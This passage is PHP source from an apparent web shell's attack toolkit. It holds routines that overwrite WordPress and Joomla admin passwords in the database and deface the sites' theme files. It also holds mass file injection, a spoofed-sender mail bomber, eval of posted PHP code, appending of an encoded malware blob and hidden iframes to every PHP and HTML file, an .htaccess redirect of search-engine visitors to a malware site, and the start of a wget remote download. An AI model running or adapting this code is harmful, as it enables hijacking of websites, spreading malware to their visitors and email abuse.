3426 echo "<center><font size=4><blink>Cannot Deface SMF Forum</blink></font></center>";
3427 }
3428 else if($_POST['forumdeface'] == "ipb")
3429 {
3430 $head = $_POST['head'];
3431 $catid = $_POST['f5'];
3432
3433 $IPB = "forums";
3434 $con =@ mysql_connect($localhost,$username,$password);
3435 $db =@ mysql_select_db($database,$con);
3436 if($prefix == "" || $prefix == null)
3437 $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'");
3438 else
3439 $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'");
3440 if($result)
3441 echo "<center><font class=txt size=4><blink>Forum Defaced Successfully</blink></font></center>";
3442 else
3443
3444 echo "<center><font size=4><blink>Cannot Deface Forum</blink></font></center>";
3445 }
3446 else if($_POST['forumdeface'] == "wp")
3447 {
3448 $site_url = $_POST['siteurl'];
3449 $index = urlencode($index);
3450 $con =@ mysql_connect($localhost,$username,$password);
3451 $db =@ mysql_select_db($database,$con);
3452 $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.'");
3453 echo("<br>[+] Changing admin password to 123456789<br>");
3454
3455 if($req1)
3456 {
3457 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
3458 $data = mysql_fetch_array($req);
3459 if(empty($site_url))
3460 $site_url=$data["option_value"];
3461 $output .= "Site : ".$site_url."<br>";
3462
3463 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
3464 $data = mysql_fetch_array($req);
3465 $template = $data["option_value"];
3466
3467 $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
3468 $data = mysql_fetch_array($req);
3469 $current_theme = $data["option_value"];
3470
3471 $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
3472 $url2=$site_url."/wp-login.php";
3473
3474 $ch = curl_init();
3475 curl_setopt($ch, CURLOPT_URL, $url2);
3476 curl_setopt($ch, CURLOPT_POST, 1);
3477 curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1");
3478 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3479 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3480 curl_setopt($ch, CURLOPT_HEADER, 0);
3481 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
3482 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3483 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3484 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3485 $buffer = curl_exec($ch);
3486
3487 $pos = strpos($buffer,"action=logout");
3488 if($pos === false) {
3489 $output.= "[-] Successful Login<br />";
3490 } else {
3491 $output.= "[+] Successful Login<br />";
3492 }
3493
3494 $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.urlencode($template);
3495 curl_setopt($ch, CURLOPT_URL, $url2);
3496 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3497 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3498 curl_setopt($ch, CURLOPT_HEADER, 0);
3499 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3500 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3501 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3502 $buffer0 = curl_exec($ch);
3503
3504 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3505 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3506
3507 if(substr_count($_file,"index.php") != 0)
3508 {
3509 $url2=$site_url."/wp-admin/theme-editor.php";
3510 curl_setopt($ch, CURLOPT_URL, $url2);
3511 curl_setopt($ch, CURLOPT_POST, 1);
3512 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3513 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3514 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3515 curl_setopt($ch, CURLOPT_HEADER, 0);
3516 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3517 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3518 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3519 $buffer = curl_exec($ch);
3520 curl_close($ch);
3521
3522 $pos = strpos($buffer,'<div id="message" class="updated">');
3523 $cond = 0;
3524 if($pos === false) {
3525 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3526 } else {
3527 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3528 $cond = 1;
3529 }
3530 }
3531 else
3532 {
3533 $url2=$site_url.'/wp-admin/theme-editor.php?file=/themes/'.$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
3534 curl_setopt($ch, CURLOPT_URL, $url2);
3535 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
3536 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
3537 curl_setopt($ch, CURLOPT_HEADER, 0);
3538 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3539 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3540 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3541 $buffer0 = curl_exec($ch);
3542
3543 $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
3544 $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
3545
3546
3547 $url2=$site_url."/wp-admin/theme-editor.php";
3548 curl_setopt($ch, CURLOPT_URL, $url2);
3549 curl_setopt($ch, CURLOPT_POST, 1);
3550 curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$index."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
3551 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3552 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3553 curl_setopt($ch, CURLOPT_HEADER, 0);
3554 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3555 curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
3556 curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
3557 $buffer = curl_exec($ch);
3558 curl_close($ch);
3559
3560 $pos = strpos($buffer,'<div id="message" class="updated">');
3561 $cond = 0;
3562 if($pos === false) {
3563 $output.= "<center><font size=4><blink>Cannot Deface Wordpress</blink></font></center>";
3564 } else {
3565 $output.= "<center><font class=txt size=4><blink>Wordpress Defaced Successfully</blink></font></center>";
3566 $cond = 1;
3567 }
3568 }
3569 } else {
3570 $output.= "[-] DB Error<br />";
3571 }
3572 echo $output;
3573 global $base_path;
3574 unlink($base_path.'COOKIE.txt');
3575 }
3576 else if($_POST['forumdeface'] == "joomla")
3577 {
3578 $site_url = $_POST['siteurl'];
3579 $dbprefix = $_POST['tableprefix'];
3580 $dbname = $_POST['f2'];
3581 $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['index']))))."'))); exit; ?>";
3582
3583 $co=randomt();
3584
3585 $link=mysql_connect($localhost,$username,$password) ;
3586 mysql_select_db($dbname,$link);
3587
3588 $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
3589
3590 $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
3591
3592 if ( $req )
3593 {
3594 $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
3595 $data = mysql_fetch_array($req);
3596 $template_name=$data["template"];
3597
3598 $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
3599 $data = mysql_fetch_array($req);
3600 $template_id=$data["extension_id"];
3601
3602 $url2=$site_url."/index.php";
3603
3604 $ch = curl_init();
3605 curl_setopt($ch, CURLOPT_URL, $url2);
3606 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3607 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3608 curl_setopt($ch, CURLOPT_HEADER, 1);
3609 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3610 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3611 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3612
3613
3614 $buffer = curl_exec($ch);
3615
3616 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
3617 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
3618
3619
3620 $url2=$site_url."/index.php";
3621 $ch = curl_init();
3622 curl_setopt($ch, CURLOPT_URL, $url2);
3623 curl_setopt($ch, CURLOPT_POST, 1);
3624 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
3625 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3626 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3627 curl_setopt($ch, CURLOPT_HEADER, 0);
3628 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3629 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3630 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3631 $buffer = curl_exec($ch);
3632
3633 $pos = strpos($buffer,"com_config");
3634 if($pos === false)
3635 {
3636 echo("<br>[-] Login Error");
3637 exit;
3638 }
3639
3640 $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
3641 $ch = curl_init();
3642 curl_setopt($ch, CURLOPT_URL, $url2);
3643 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3644 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3645 curl_setopt($ch, CURLOPT_HEADER, 0);
3646 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3647 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3648
3649 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3650 $buffer = curl_exec($ch);
3651
3652 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
3653 if(!$hidden2)
3654 {
3655 echo("<br>[-] index.php Not found in Theme Editor");
3656 exit;
3657 }
3658
3659 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3660
3661 $ch = curl_init();
3662 curl_setopt($ch, CURLOPT_URL, $url2);
3663 curl_setopt($ch, CURLOPT_POST, 1);
3664 curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
3665
3666 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3667 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3668 curl_setopt($ch, CURLOPT_HEADER, 0);
3669 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3670 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3671 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3672 $buffer = curl_exec($ch);
3673
3674 $pos = strpos($buffer,'<dd class="message message">');
3675 if($pos === false)
3676 {
3677 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3678 }
3679 else
3680 {
3681 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3682 }
3683 }
3684 else
3685 {
3686 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3687 $data = mysql_fetch_array($req);
3688 $template_name=$data["template"];
3689
3690 $url2=$site_url."/index.php";
3691 $ch = curl_init();
3692 curl_setopt($ch, CURLOPT_URL, $url2);
3693 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3694 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3695 curl_setopt($ch, CURLOPT_HEADER, 1);
3696 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3697 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3698 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3699 $buffer = curl_exec($ch);
3700
3701 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3702
3703 $url2=$site_url."/index.php";
3704 $ch = curl_init();
3705 curl_setopt($ch, CURLOPT_URL, $url2);
3706 curl_setopt($ch, CURLOPT_POST, 1);
3707 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3708 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3709 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3710 curl_setopt($ch, CURLOPT_HEADER, 0);
3711 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3712 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3713 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3714 $buffer = curl_exec($ch);
3715
3716 $pos = strpos($buffer,"com_config");
3717
3718 if($pos === false)
3719 {
3720 echo("<br>[-] Login Error");
3721 exit;
3722 }
3723
3724 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3725 $ch = curl_init();
3726 curl_setopt($ch, CURLOPT_URL, $url2);
3727 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3728 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3729 curl_setopt($ch, CURLOPT_HEADER, 0);
3730 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3731 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3732 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3733 $buffer = curl_exec($ch);
3734
3735 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3736
3737 if(!$hidden2)
3738 {
3739 echo("<br>[-] index.php Not found in Theme Editor");
3740 }
3741
3742 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3743 $ch = curl_init();
3744 curl_setopt($ch, CURLOPT_URL, $url2);
3745 curl_setopt($ch, CURLOPT_POST, 1);
3746 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3747 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3748 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3749 curl_setopt($ch, CURLOPT_HEADER, 0);
3750 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3751 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3752 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3753 $buffer = curl_exec($ch);
3754
3755 $pos = strpos($buffer,'<dd class="message message fade">');
3756 if($pos === false)
3757 {
3758 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3759 exit;
3760 }
3761 else
3762 {
3763 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3764 }
3765 }
3766 }
3767}
3768else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3769{
3770 $filetype = $_POST['filetype'];
3771
3772 $mode = "a";
3773
3774 if($_POST['mode'] == 'Apender')
3775 $mode = "a";
3776
3777 if($_POST['mode'] == 'Overwriter')
3778 $mode = "w";
3779
3780 if (is_dir($_POST['pathtomass']))
3781 {
3782 $lolinject = $_POST['injectthis'];
3783 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3784 if(substr($_POST['pathtomass'], -1) == "\\")
3785 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3786 foreach (glob($mypath) as $injectj00)
3787 {
3788 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3789 continue;
3790 $fp=fopen($injectj00,$mode);
3791 if (fputs($fp,$lolinject))
3792 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3793 else
3794 echo 'failed to inject '.$injectj00.'<br>';
3795 }
3796 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3797 foreach ($dirs as $dir)
3798 {
3799 injectdir($dir,$filetype,$mode,$lolinject);
3800 }
3801 echo "<center>".$mycount." files injected</center>";
3802 }
3803 else
3804 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3805}
3806else if(isset($_POST['mailfunction']))
3807{
3808 if($_POST['mailfunction'] == "dobombing")
3809 {
3810 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3811 {
3812 $times = $_POST['times'];
3813 while($times--)
3814 {
3815 if(isset($_POST['padding']))
3816 {
3817 $fromPadd = rand(0,9999);
3818 $subjectPadd = " -- ID : ".rand(0,9999999);
3819 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3820
3821 }
3822 $from = "hello$fromPadd@abcd.in";
3823 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3824 {
3825 $error = 1;
3826 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3827 break;
3828 }
3829 }
3830 if($error != 1)
3831 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3832 }
3833 }
3834 else if($_POST['mailfunction'] == "massmailing")
3835 {
3836 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3837 {
3838 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3839 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3840 else
3841 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3842 }
3843 }
3844}
3845else if(isset($_POST['code']))
3846{
3847 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3848 {
3849 // FIlter Some Chars we dont need
3850 ?><br>
3851 <textarea name="code" class="box" cols="120" rows="10"><?php
3852 $code = str_replace("<?php","",$_POST['code']);
3853 $code = str_replace("<?","",$code);
3854 $code = str_replace("?>","",$code);
3855
3856 // Evaluate PHP CoDE!
3857 htmlspecialchars(eval($code));
3858 ?>
3859 </textarea><?php
3860 }
3861 else if($_POST['code'] != null && $_POST['intext'] == "false")
3862 {
3863 $code = str_replace("<?php","",$_POST['code']);
3864 $code = str_replace("<?","",$code);
3865 $code = str_replace("?>","",$code);
3866
3867 // Evaluate PHP CoDE!
3868 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3869 }
3870}
3871else if(isset($_GET['infect']))
3872{
3873 $mal_code="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";
3874 $coun = 0;
3875 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3876 {
3877 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3878 continue;
3879 if($myfile=fopen($injectj00,'a'))
3880 {
3881 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3882 fclose($myfile);
3883 $coun = 1;
3884 }
3885 }
3886 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3887 {
3888 if($myfile=fopen($injectj00,'a'))
3889 {
3890 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3891 fclose($myfile);
3892 $coun = 1;
3893 }
3894 }
3895 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3896 {
3897 if($myfile=fopen($injectj00,'a'))
3898 {
3899 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3900 fclose($myfile);
3901 $coun = 1;
3902 }
3903 }
3904 if($coun == 1)
3905 echo "<center>Done !!!!<center>";
3906 else
3907 echo "<center>Cannot open files !!!!<center>";
3908}
3909else if(isset($_GET['infectiframe']))
3910{
3911 $coun = 0;
3912 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3913 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3914 {
3915 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3916 continue;
3917 if($myfile=fopen($injectj00,'a'))
3918 {
3919 fputs($myfile, $str);
3920 fclose($myfile);
3921 $coun = 1;
3922 }
3923 }
3924 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3925 {
3926 if($myfile=fopen($injectj00,'a'))
3927 {
3928 fputs($myfile, $str);
3929 fclose($myfile);
3930 $coun = 1;
3931 }
3932 }
3933 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3934 {
3935 if($myfile=fopen($injectj00,'a'))
3936 {
3937 fputs($myfile, $str);
3938 fclose($myfile);
3939 $coun = 1;
3940 }
3941 }
3942
3943
3944 if($coun == 1)
3945 echo "<center>Done !!!!<center>";
3946 else
3947 echo "<center>Cannot open files !!!!<center>";
3948}
3949else if(isset($_GET['redirect']))
3950{
3951 if($myfile = fopen(".htaccess",'a'))
3952 {
3953 $mal = "# BEGIN WordPress
3954RewriteEngine On
3955RewriteOptions inherit
3956RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3957RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3958RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3959RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3960RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3961RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3962RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3963RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3964RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3965RewriteRule .* ".$malsite." [R,L]\n\r";
3966 fwrite($myfile, $mal);
3967 fclose($myfile);
3968 echo "<center>Done !!!!<center>";
3969 }
3970 else
3971 echo "<center>Cannot open file !!!!<center>";
3972}
3973else if(isset($_GET['malware']))
3974{ ?>
3975 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3976 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3977 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3978 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3979 <div id="showmal"></div>
3980 <?php
3981}
3982else if(isset($_GET['codeinsert']))
3983{
3984 if($file1 = fopen(".htaccess",'r'))
3985 {
3986 ?><div id="showcode"></div>
3987 <form method=post>
3988 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3989 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3990 </form>
3991 <?php }
3992 else
3993 echo "<center>Cannot Open File!!</center>";
3994}
3995else if(isset($_POST['getcode']))
3996{
3997 if($myfile = fopen(".htaccess",'a'))
3998 {
3999 fwrite($myfile, $_POST['getcode']);
4000 fwrite($myfile, "\n\r");
4001 fclose($myfile);
4002 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
4003 }
4004 else
4005 echo "Permission Denied";
4006}
4007else if(isset($_GET['uploadurl']))
4008{
4009 $functiontype = trim($_GET['functiontype']);
4010 $wurl = trim($_GET['wurl']);
4011 $path = magicboom($_GET['path']);
4012
4013 function remotedownload($cmd,$url)
4014 {
4015 $namafile = basename($url);
4016 switch($cmd)
4017 {
4018 case 'wwget':
4019 execmd(which('wget')." ".$url." -O ".$namafile);
